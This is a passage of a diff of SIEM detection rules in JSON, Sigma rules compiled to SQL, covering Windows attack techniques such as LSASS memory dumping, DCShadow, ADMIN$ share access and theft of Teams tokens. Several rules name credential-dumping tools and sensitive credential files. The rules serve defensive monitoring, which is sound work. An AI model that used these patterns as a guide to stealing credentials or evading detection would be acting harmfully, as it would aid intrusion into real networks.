"Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".pub\" files from those locations" + "Legitimate use of remote PowerShell execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "ScreenConnect Temporary Installation Artefact", - "id": "fec96f39-988b-4586-b746-b93d59fd1922", + "title": "Access to ADMIN$ Share", + "id": "098d7118-55bc-4912-a836-dc6483a8d150", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects access to $ADMIN share", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate use" + "Legitimate administrative activity" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5140' AND ShareName = 'Admin$') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + ], + "filename": "win_security_admin_share_access.yml" + }, + { + "title": "Defrag Deactivation - Security", + "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "status": "test", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" ], - "filename": "file_event_win_screenconnect_artefact.yml" + "filename": "win_security_apt_slingshot.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "Potential Initial Access via DLL Search Order Hijacking", - "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "author": "Tim Rauch (rule), Elastic (idea)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR Image LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR Image LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "Suspicious desktop.ini Action", - "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_desktop_ini.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", - "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.003", - "attack.t1003.004", - "attack.t1003.005" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate used of encrypted ZIP files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "Transferring Files with Credential Data via Network Shares", + "id": "910ab938-668b-401b-b08c-b596e80fdca5", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26858" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Transferring sensitive files for legitimate administration work by legitimate administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" }, { - "title": "Creation of a Diagcab", - "id": "3d0ed417-3d94-4963-a562-4a92c940656a", + "title": "Password Protected ZIP File Opened", + "id": "00ba9da1-b510-4f6b-b258-8d338836180f", "status": "experimental", - "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", - "author": "frack113", - "tags": [ - "attack.resource_development" - ], + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate microsoft diagcab" + "Legitimate used of encrypted ZIP files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.diagcab' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_diagcab.yml" + "filename": "win_security_susp_opened_encrypted_zip.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Suspicious Access to Sensitive File Extensions", + "id": "91c945bc-2ad1-4799-a591-4d00198a1215", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects known sensitive file extensions accessed on a network share", + "author": "Samir Bousseaden", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.collection", + "attack.t1039" + ], + "falsepositives": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" ], + "filename": "win_security_susp_raccess_sensitive_fext.yml" + }, + { + "title": "Group Modification Logging", + "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "status": "stable", + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "author": "Alexandr Yampolskyi, SOC Prime", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4728', '4729', '4730', '633', '632', '634'))" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_group_modification_logging.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", + "id": "f63508a0-c809-4435-b3be-ed819394d612", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" ], - "filename": "file_event_win_winrm_awl_bypass.yml" + "filename": "win_security_user_driver_loaded.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "Possible DC Shadow Attack", + "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DCShadow via create new SPN", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1207" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "Valid on domain controllers; exclude known DCs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_possible_dc_shadow.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "title": "DPAPI Domain Master Key Backup Attempt", + "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at 